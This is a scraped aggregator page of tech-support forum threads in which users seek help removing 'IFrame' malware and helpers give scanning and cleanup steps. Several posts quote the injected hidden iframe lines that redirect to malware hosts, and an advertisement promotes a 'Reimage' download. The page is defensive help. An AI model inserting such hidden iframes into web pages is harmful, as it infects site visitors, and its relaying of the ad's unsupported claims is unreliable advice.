Over 1 million tech questions and answers.

IFrame Virus

Q: IFrame Virus

I have searched posts here for other virus help and have downloaded the Malwarebytes that was suggested and will put copy on the infected computer. I have run my Avast Antivirus and the OneCare but still have problems.QUESTIONS:1-Does this Malwarebytes program have any problems with other Antivirus progams running?2-Will this program get rid of the iframe virus? 3-I noticed a strange program in my msconfig StartUp it was named freddy42 I have disabled it. I have checked and now know it is part of this virus. 4-Should I have diabled freddy 42? I think that is why I may be still infected.5-Do I need to have all programs enabled in my StartUp to ensure complete virus removal.6- Can the infected computer infect laptop, it is on shared network? I have disabled all sharing folders and files with infected computer.I took a picture of the message as it is loading the bogus page. It says: waiting for res://ieframe.dll/dnserrror.htm. I can't log on anywhere to get more info or help so I am using my laptop now to get work done....

RELEVANCY SCORE 200
Preferred Solution: IFrame Virus

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/download.php. (This link will automatically start a download of Reimage that you can save to your computer.)

A: IFrame Virus

In answer to question onePrograms that monitor and prevent registry changes such as Spybot S&D Teatimer function and Winpatrol need to be disabledIn answer to number two post a log and we'll take it from thereDisable freddy42 using Autorunshttp://technet.microsoft.com/en-us/sysinte...s/bb963902.aspxNumber 5 - noNumber 6 - yesAre you using a digital picture frame? Whatever USB attachment it is, do not use it right nowI'm moving this to AII-----------------------------------------------------The process of cleaning your computer may require you to temporarily disable some security programs. If you are using SpyBot Search and Destroy, please refer to Note 2 at the bottom of this page.Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link 1alternate download link 2Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself.Press the OK button to close that box and continue.If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found".Click OK to close the message box and continue with the removal process.Back at the main Scanner screen:Click on the Show Results button to see a list of any malware that was found.Make sure that everything is checked, and click Remove Selected.When removal is completed, a log report will open in Notepad.The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.Copy and paste the contents of that report in your next reply and exit MBAM.Note:-- If MBAM encounters a file that is difficult to remove, you may be asked to reboot your computer so it can proceed with the disinfection process. Regardless if prompted to restart the computer or not, please do so immediately. Failure to reboot normally (not into safe mode) will prevent MBAM from removing all the malware. Note 2:-- MBAM may make changes to your registry as part of its disinfection routine. If you're using other security programs that detect registry changes (like Spybot's Teatimer), they may interfere with the fix or alert you after scanning with MBAM. Please disable such programs until disinfection is complete or permit them to allow the changes. To disable these programs, please view this topic: How To Temporarily Disable Your Anti-virus, Firewall And Anti-malware Programs

Read other 6 answers
RELEVANCY SCORE 55.2

Hi Guys,

I have a problem with my computer.
looks i have a virus/malware inside my computer. I have to try to restore using system restore, seems i doesn't work.

This kind of <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> infected all of my HTML/PHP/ASPX files in my computer.
I had to try to delete it using notepad, but when i open it again. it still there.

Can sombody please help me, cause i still had a lot of work must be finished monday, and i can't continue to work if my computer still behave like this.

Here is log file using DDS i created to you guys. Thanks for your help

A:<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.comDDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the resul... Read more

Read other 2 answers
RELEVANCY SCORE 52

I have run eset online scanner tool and it identifies problem as HTML/Iframe.B.Gen virus and JS/Exploit.Agent.NHC trojan.  The eset tool never completes its scan.  I have run Malwarebyte's and Rogue Killer.  Each removed some other malware but repeating those scans don't find anything now.  PC is very slow.  I have attempted to run CCleaner and it never completes it's analysis when scanning for temporary Internet files.  This is an office PC.  QS1 and Integra/Docutrack are legit applications.
 
Thanks for any help provided. 
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 NETWORK
Internet Explorer: 8.0.7601.17514
Run by NSSUser at 8:48:44 on 2014-08-07
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3998.1045 [GMT -4:00]
.
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\mfevtps.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\ctfmon.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Program Files (x86)\Task Killer\TaskKil... Read more

A:HTML/Iframe.B.Gen virus

Hi there,my name is Marius and I will assist you with your malware related problems.Before we move on, please read the following points carefully. First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding. Perform everything in the correct order. Sometimes one step requires the previous one. If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem. Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me. Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts. If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed. Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean. My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.  Please upload attach.txt as well and do the following:   Scan with Gmer rootkit scannerPlease download Gmer from here by clicking on the "Download EXE" Button.Double click on the randomly named GMER.exe. If asked to allow gmer.sys driver to load, please consent.If it giv... Read more

Read other 16 answers
RELEVANCY SCORE 52

I have my website by name:padasalgi.tripod.com since 11 years.Today when I tried to goto my site I am getting the following alert message and connection to any files in this url are disconnected. I am very much afraid since the contents of my webpages could not be surfed by any one due to this malware.I am quite new to the malware/worms etc I humbly request will any one please advise and guide me how this malware virus could be removed. The details of the malware alert are as under:avast!WarningA Virus Was Found!There is no reason to worry,though avast! has stopped the malware before it could enter your computer.When you click on the "Abort connection" button, the download of the dangerous file will be cancelled.File name: http://padasalgi.tripod.com/\{gzip}Malware name :HTML.Iframe-infMalware type : Virus/WormVPS version : 091227-0,12/*27/2009I once again request everybody please help me in removing this virus.

Read other answers
RELEVANCY SCORE 52

It would appear that I have this virus, however ESET won't get rid of it. I've run through a full ESET scan and a comboxfix scan to get the logs, but it remains. Here is the comboxfix log (I know I was supposed to wait, but I didn't, so here it is)---Any help you can provide would be much appreciated

ComboFix 12-03-07.05 - jeffrey 03/07/2012 12:02:41.9.4 - x64
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.1.1033.18.3891.1855 [GMT -5:00]
Running from: c:\users\jeffrey\Downloads\ComboFix.exe
AV: ESET NOD32 Antivirus 4.0 *Disabled/Updated* {CB0F8167-5331-BA19-698E-64816B6801A5}
SP: ESET NOD32 Antivirus 4.0 *Disabled/Updated* {706E6083-750B-B597-533E-5FF310EF4B18}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((( Files Created from 2012-02-07 to 2012-03-07 )))))))))))))))))))))))))))))))
.
.
2012-03-07 17:10 . 2012-03-07 17:10 -------- d-----w- c:\users\Public\AppData\Local\temp
2012-03-07 17:10 . 2012-03-07 17:10 -------- d-----w- c:\users\Default\AppData\Local\temp
2012-03-07 09:05 . 2012-03-07 09:05 69000 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{482AB6A2-8D49-42D9-8C76-E616CD14062A}\offreg.dll
2012-03-06 15:36 . 2012-02-08 07:13 8643640 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{482AB6A2-8D49-42D9-8C76-E616CD14062A}&... Read more

A:html/iframe.B.Gen virus

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps.===Your ComboFix log is clean.The type of infection you are seeing could have been incorporated in a all your .htm or. html files.You probably got this type of error message.http://www.wilderssecurity.com/attachment.php?attachmentid=212754&stc=1&d=1254737545Open the file with notepad copy the content and post it here for my review.You should also send the report to ESET for there review.

Read other 2 answers
RELEVANCY SCORE 52

Offending site recorded it is hxttp://www.visitcouns.com
The HTMLIframe-inf is a bad one and only blockers are available from your
antvirus program if they have made one! Ruining everyones internet experience and jumping on legitimate sites. It's tragic! Hardly wait for the final fix
to be in at msupdate so called patched version of firefox has not worked out
virus has mutated! Times for most likely attacks in North America are early
morning. Any help would be appreciated.

A:re:iframe drive by virus

Yeah it's mr-toad again with something to add re:the iframe threat.
If you signed up for a my space account and didn't make it private you
should have. I didn't and paid the price. I suspect that it all stemmed from
there finally got pissed off dismantled the site, after making it private! Closed the account; it's now early morning and no attacks thus far. If you use IMs keep your contacts only for people you really!!!! know. I trashed my IMs because there a royal pain in the butt. I'll be keeping up to date with a thumbs up or thumbs down. Hope this helps someone.


They call me mr-toad. cheers everyone

Read other 2 answers
RELEVANCY SCORE 52

Hi All,

I have many (Url's & Htm) saved web pages in my PC
Suddenly ESET is detecting this alert in all of them (strange)
HTML/Iframe.B.Gen Virus

((i attached a photo to explain it))

I felt frustrated when I got this Alert
HTML/Iframe.B.Gen virus

And the only solution in ESET mind is to DELETE them .. not clean not disinfect..
isn't there any other solution to disinfect this virus ... that if the virus is really there ..

ESET is blocking opening them (The url or htm) .. the only way to open it is to disable the antivirus ..
and when I do that .. nothing wrong happen..

HELP PLEASE !!!!

((by the way: I dont want to zip any of my Url's and submit it to ESET, I want a solution how to disinfect this virus))
I tried Combofix, it didn't help

A:HTML/Iframe.B.Gen Virus (( HELP )) !?!?!?

This is the Photo

Read other 4 answers
RELEVANCY SCORE 52

i need help with this virus Thanks

html/iframe.B.Gen virus

this virus is on my laptop

im running vista 64 bit

A:i need help with this html/iframe.B.Gen virus

Welcome aboard Download Security Check from HERE, and save it to your Desktop. * Double-click SecurityCheck.exe * Follow the onscreen instructions inside of the black box. * A Notepad document should open automatically called checkup.txt; please post the contents of that document.=============================================================================Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.Make sure the following options are checked:
Internet ServicesWindows FirewallSystem RestoreSecurity Center/Action CenterWindows UpdatePress "Scan".It will create a log (FSS.txt) in the same directory the tool is run.Please copy and paste the log to your reply.====================================================================================Please download MiniToolBox and run it.Checkmark following boxes:Report IE Proxy SettingsReport FF Proxy SettingsList content of HostsList IP configurationList Winsock EntriesList last 10 Event Viewer logList Installed ProgramsList Devices (do NOT change any settings here)List Users, Partitions and Memory sizeClick Go and post the result.=============================================================================Download Malwarebytes' Anti-Malware (aka MBAM): http://www.malwarebytes.org/products/malwarebytes_free to your desktop. * Double-click mbam-setup.exe and follow the prompts to install the program. * At the end, be sure a checkmark is placed next to Update Malware... Read more

Read other 10 answers
RELEVANCY SCORE 52

I just did an eset scan that took an hour and a half. It showed that I had 2 infected files in my sons profile listed as "HTML/Iframe.B.Gen" virus. it says that it is in his mozilla data. Is this real, or a false positive? I am running Kapersky and it didn't throw up any red flags yet. HELP!

A:HTML/Iframe.B.Gen virus

Hello, ESET is very accurate,but not flawless.ESET Short description HTML/Iframe.B.Gen is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious softwareThe <iframe> tag specifies an inline frame.An inline frame is used to embed another document within the current HTML document.--------------------------------------------------------------------------------To see if this is possibly a False positive. We should double check it before we take action.Lets' upload this file for a second opinion on what it actually is..Please make sure that you can view all hidden files. Instructions on how to do this can be found here:How to see hidden files in WindowsPlease click this link-->JottiWhen the jotti page has finished loading, click the Browse button and navigate to the following file and click Submit. <filepath>suspect.file Please post back the results of the scan in your next post.If Jotti is busy, try the same at Virustotal: http://www.virustotal.com/NOTE:For submission to a specific anti-virus vendor see Submitting Virus Samples: How to Submit a Virus.

Read other 5 answers
RELEVANCY SCORE 52

Please help.. have Iframe.gs a script virus type of problem..all my htm file etc have been hit..can not seem to stop it spreading...malware-by does not see it ...bitdefender can not disinfect or quarantine ..so I have to delete..leave program currupted..help please

A:Iframe script/virus

Hi and welcome. Can we get a log from MBAM?run MBAM (MalwareBytes):Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link 1alternate download link 2MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself. Press the OK button to close that box and continue.If you encounter any problems while downloading the definition updates, manually download them from here and just double-click on mbam-rules.exe to install.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so plea... Read more

Read other 1 answers
RELEVANCY SCORE 52

Hello,Two days ago AVG?s resident shield announced a chura virus when opening Firefox. I searched and found the line <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> in a HTML file just before the body closing tag. I made a search with Vista search (very slow) and found 59 HTML files with the same code on the same place. I scanned the computer with AVG and then with Anti-Malware, Ad-Aware and SUPERAntiSpyware. No way, they found just a few small problems that were taken care of. I removed that line of code from all files, but when I made another search there were over 150 infected files. I repeated the cycle (search, clean the files by hand, AVG and the others). This time AV and AS found nothing! I made a third search and now there were nearly 2000 infected HTML files. I can?t clean so many files by hand, and from the previous experiences it was worthless because all the files I had cleaned were infected again.I have a site and its files on my computer are now infected. I cannot access the site because I am sure to spread the virus all over and also distribute the virus to whoever visits. Not better is the fact that I save many files in HTML because I find it practical, so I have many HTML files. Even worse is that the infection is not on the start up HD with the OS where I could just reformat and reinstall or replace with a saved image, but on another HD where I have all my files and the site files. The C: disk has only ... Read more

A:<iframe> chura virus

Hello Straydog,In checking web references on the type of infection you posted here I see, as you probably have, a trail of discussions going back to perhaps March, and few with any direct confirmation of the infection sources, or complete solutions. However, in some of that web info I see references to "Virto" which is a form of the Virut file infector malware (see here). Virto/Virut injects it's code into all of certain file types on systems, and is so pervasive and elusive in activities that the only best option for a solution is to reformat and reinstall, and all without saving any personal data from the system. If I were a site owner (and I am) and knew my system was infected with such a virulent malware (which has happened to one of my systems), I would reformat and reinstall, and regroup after as far as how to return needed settings and softwares etc. We can do some scan/checks here to see what all still needs cleaning, but up front, should there be any verification of Virto involvement I will end all assistance, with the correct suggestion of that reformat/reinstall solution.For the website, send me via PM the site name, so I can evaluate it's current status. Plan to only access that site from some other computer that is known to be malware free, and also has not been used before to access the site's web program (such as cPanel). From a different computer right now, change all control panel/site passwords. You can assume the site's security has been compromis... Read more

Read other 7 answers
RELEVANCY SCORE 52

My stepson has downloaded a virus onto my laptop.
I ran a full scan using malwarebytes, superantispyware, & avast and removed everything they found but my computer still isn't working properly.
The task manager has been remotely disabled and i can't seem to turn it back on, i cannot sytem restore, & everytime i open a new web page avast flags up as finding a virus 'HTML:Iframe.inf' as many as 5 times per page. (When I ran avast it found over 1000 of these).
I am including a hijack this log
I really need help here as I don't know what I am doing when i get beyond the basics.
Thanks in advance and here's the hijackthis log

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 23:02:02, on 02/02/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16762)
Boot mode: Normal

Running processes:
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\acs.exe
C:\Program Files\Google\Common\Goo... Read more

A:I can't get rid of HTML:Iframe-inf virus

Hello and welcome to TSF.

HijackThis is not used as the initial analysis tool in this forum.

We want all our members to perform the steps outlined in the link given below, before posting for assistance. There's a sticky at the top of this forum, and a
Quote:




Having problems with spyware and pop-ups? First Steps




link at the top of each page.

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Read other 1 answers
RELEVANCY SCORE 52

I am using windows XP SP3 with ESET NOD v 4.0.437.0 and firefox 3.5.19

When I access some websites lately ESET NOD reports some viral activity and blocks access to a third party web address. The problem is repeatable on a these websites then seems to go away after a day or two and a similar problem may occur when accessing a different website.

One example of the threat warning is:

Object:
http://jclao.com/archives/1283

Threat:
HTML:Iframe.B.Gen virus
Connection terminated - quarantined

A second message then appeared:

Address has been blocked:
"www.jdbbank.com/gadgets/gadgets.php"
IP address:
61.19.241.97:80

The website owners claimed they have checked their site with several checkers and found no virus. although jdbbank did have a legitimate link on their site.

I later got a simialr message from a completely unrelated site (cme.com) so I became suspicious that my computer may have some malware. That access reported activity by the Kryptic.E trojan, but I did not manage to copy the full details.

I ran a full scan with ESET NOD32, but found nothing.

I ran the steps in your prep guide. The DDS log is pasted below.

The attach.txt and GMER log files are attached.

Note the GMER log took nearly 12 hours to complete.

.
DDS (Ver_11-03-05.01) - NTFSx86
Run by Nick at 18:19:06.98 on Thu 05/05/2011
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_23
Microsoft Windows XP Professional 5.1.2600.3.1252.61.1033.18.1526.524 [GMT 7:00]
.
AV: ESET NOD32 Antiv... Read more

A:Iframe.B.Gen and or Kryptik.E virus

Hi,Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.Please subscribe to this topic, if you haven't already. Click the Watch This Topic button at the top on the right.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there.The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.Once I receive a reply then I will return with your first instructions.Thanks

Read other 18 answers
RELEVANCY SCORE 52

I recently went to a website and my NOD32 came up with a Iframe.b.gen warning.
I immediately did a full scan on my computer and found nothing, but it would put my mind at rest if someone could have a look at my log files.

I ran gmer but the text files came up blank

.
DDS (Ver_11-03-05.01) - NTFS_AMD64
Run by Darren at 21:13:27.69 on 24/03/2011
Internet Explorer: 8.0.7600.16385 BrowserJavaVersion: 1.6.0_24
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.44.1033.18.6135.4461 [GMT 0:00]
.
AV: ESET NOD32 Antivirus 4.2 *Enabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
SP: ESET NOD32 Antivirus 4.2 *Enabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\ESET\ESET NOD32 Antivirus... Read more

A:Iframe.B.gen virus warning

Hello and Welcome to TSF.

Please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

I'm not seeing anything in your logs. We'll do an online scanner to check for remnants shortly.

------------------------------------------------------

Advanced SystemCare

We do not recommend the use of registry cleaners. Our colleague miekiemoes has an excellent writeup here

We suggest uninstalling them via Programs and Features in your Control Panel.

------------------------------------------------------

Please uninstall the following via Start->(or Computer)->Control Panel->Programs->Programs and Features if it still exists:

Coupon Printer for Windows<<Please read here

If you decide to uninstall it, also delete the following Folder if it still exists:

C:\Program Files\Coupons

------------------------------------------------------

Please run this online scan to help look for remnants. Ensure your external and/or USB drives are inserted during the scan.

In 64-bit Windows Vista/Win7, you must open the 64-bit IE browser.

Navigate to C:\Program Files (x86)\Internet E... Read more

Read other 2 answers
RELEVANCY SCORE 52

I have a small network that consist of a about 4 pc's and a web server. There has been some sort of virus infecting my web server. The virus injects my index.html files with malicious lines of codes directing users to a virus infected site. I am thinking that the virus is on one of my client pc's connecting to the server via ftp. I have ran multiple scans on the server and found nothing. Now I am leaning towards the pc's. I have posted the logs for of the first pc to review.Here is an example of the line of code this virus is putting in the index.html file of the websites:<iframe src="http://woocasino.com/s2/show.php" width="1" height="1" style="display:none;"></iframe></body>DDS (Ver_09-07-30.01) - NTFSx86 Run by richard.mcmaster at 15:23:49.85 on Fri 08/28/2009Internet Explorer: 7.0.5730.13 BrowserJavaVersion: 1.6.0_15Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.2014.742 [GMT -5:00]AV: McAfee VirusScan Enterprise *On-access scanning enabled* (Updated) {918A2B0B-2C60-4016-A4AB-E868DEABF7F0}============== Running Processes ===============C:\windows\system32\Ati2evxx.exeC:\windows\system32\svchost -k DcomLaunchsvchost.exeC:\windows\System32\svchost.exe -k netsvcssvchost.exesvchost.exeC:\windows\system32\spoolsv.exesvchost.exeC:\windows\IntelliAdminRC3\Agent32.exeC:\Program Files\Java\jre6\bin\jqs.exeC:&... Read more

A:Infected with Iframe virus

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

Read other 2 answers
RELEVANCY SCORE 51.2

Hello,

Avast (free) often gives me warnings that it has blocked malware from websites - that I have not visited, even when I am not surfing (but, with the Firefox browser on).

I (foolishly I think) was looking for help through Avast -which gave me a phone number to a support company called Yogi. I gave the fellow I talked to access to my puter. After checking my registry, he said that I had infections, but had to pay $186.00 for him to fix it (with a year's support). In hindsight, I think the help number was only a marketing ploy. I just hope they did not add any other programs to hijack my system or keylog my passwords (or other such ploys) when they had access.

In any case, I am hoping that you can help me get rid of what Avast keeps reporting as a HTML:Iframe-inf virus (or malware), that seems to keep trying to take my browser to several different websites (even when I am not surfing).

I hope that I have provided all the info requested below. If not, please just ask for any further info that may be of help. Thank-you very much in advance, for any help that you can offer.

Tech Support Guy System Info Utility version 1.0.0.2
OS Version: Microsoft Windows XP Professional, Service Pack 3, 32 bit
Processor: Intel(R) Pentium(R) 4 CPU 3.00GHz, x86 Family 15 Model 3 Stepping 4
Processor Count: 2
RAM: 2046 Mb
Graphics Card: ASUS AH4650 Series, 1024 Mb
Hard Drives: C: Total - 31580 MB, Free - 20240 MB; D: Total - 30718 MB, Free - 21415 MB; M: Total - 63263 MB, Free - 257... Read more

A:HTML:Iframe-inf malware or virus

Hello again,

Today I had the same problem again. When Avast kept giving me warnings and notifications that it has protected me from going onto malicious websites (even when I wasn't surfing), I pushed "More Info" button on the Avast pop-up, which took me to the Avast webpages that explained more about the infections.

I did this for two Avast warning pop-ups (that tried to take me to two different malicious sites). Below are the URL's to the two Avast webpages that opened, when I clicked the "more info" button on the warning pop-up:

http://www.avast.com/en-ca/lp-secur...llenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComObjects\update.exe&p_obj=http://www.allzoomovies.com/?x=4302&p_var=.%2Ffa%2Fen-ca%2Fvirus-alert-default2&p_pro=0&p_vep=6&p_ves=0&p_lqa=0&p_lsu=24&p_lst=0&p_lex=162&p_lng=en&p_lid=en-ca&p_elm=7&p_vbd=1367
http://www.avast.com/en-ca/lp-secur...llenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComObjects\update.exe&p_obj=http://www.animalsexmania.net/?x=9171.5825.7884.4683&p_var=.%2Ffa%2Fen-ca%2Fvirus-alert-default2&p_pro=0&p_vep=6&p_ves=0&p_lqa=0&p_lsu=24&p_lst=0&p_lex=162&p_lng=en&p_lid=en-ca&p_elm=7&p_vbd=1367

Note that the first hijack or re-direct (or whatever) attempt tried to take my browser to allzoomovies.com,which is in the first (Avast website... Read more

Read other 2 answers
RELEVANCY SCORE 51.2

I am running windows XP. Avast pops up with a warning that HTML:Iframe-inf malware has been found and recommended action was to Move to chest. I tried to do that and error box pops up that says "The process cannot access the file because it is being used by another process". Cannot process"C\Documents and Settings\Martha\Local Settings\Temporary Internet Files\Content.IE5\QJJFI4H9\client_ad[2].htm''file.I attempted to shutdown all my programs except the Avast warning box; and could not get Yahoo messenger to close. I did the control/alt/delete thing and tried to 'end process' on the yahoo IM.....still did not close. NO amount of clicking on 'end now' did the trick either. I have not shut down and rebooted. My browser if Firefox.....I don't use IE. So, please guide me in removing HTML:Iframe-inf from my computer. Please also bear in mind that I am rather computer illiterate.....confess to be rather duhhhh but am very cautious about going to websites; clicking on links (don't); etc. but perhaps the Mister is not so cautious. I am in a remote location and do not have anyone to help me get rid of this #^%* HTML:Iframe-inf Anybody out there know how to walk a 5 year old through the clean up process of this virus/worm? [smile]

A:HTML:Iframe-inf A VIRUS WAS FOUND!

Schedule a boot time scan - see this linkhttp://www.digitalred.com/avast-boot-time.php

Read other 1 answers
RELEVANCY SCORE 51.2

I ran ESET online scanner becasue my PC was running slow and found the
HTML/Iframe.B.Gen virus.

What are the steps to getting rid of it forever?
 

A:I'm infected with the HTML/Iframe.B.Gen virus - help!

http://speccy.piriform.com/results/pGSzT8aH8JrdO3TzDA5MuSy
 

Read other 1 answers
RELEVANCY SCORE 51.2

Seems nothing I do is enough to get rid of the virus. Formatted ny HDD twice and also reinstalled windows, previously ran both MBAM premium and the trial version of NOD32 but nod32 actually detected every system file as a threat and made my system unstable. So had to reinstall the windows 7 os again. The latest, I refrained from instaling Nod32 anymore and preferred to use their online scanner just to get a report. I would like to recover/disinfect the html files as they are important to me. Any help is appreciated. Unfortunately even my backup drive has been infected too so not much use anymore. Previously I had tried to use the notepad++ program's search and replace tool to get rid of the iframe virus but the fix seemed to be temporary.
 
 
Anyhow here is eset log, thanks

A:HTML/Iframe.B.Gen virus, Virut and more

Hi secretaatoooo,
 
You are infected with Virut, which is a file infecting virus (.exe, .scr, .html). This will take some effort to try and save your HTML files, and it may not even be possible. The problem is that any attempts may corrupt the files, or delete them. Let me see which tools is most effective and I will reply to you.
 
xXToffeeXx~

Read other 7 answers
RELEVANCY SCORE 51.2

NOD32 keeps telling me I'm infected with Sirefef and HTML/Iframe.B.Gen virus. Can someone please help me clean my computer?

DDS (Ver_2012-11-20.01) - NTFS_AMD64
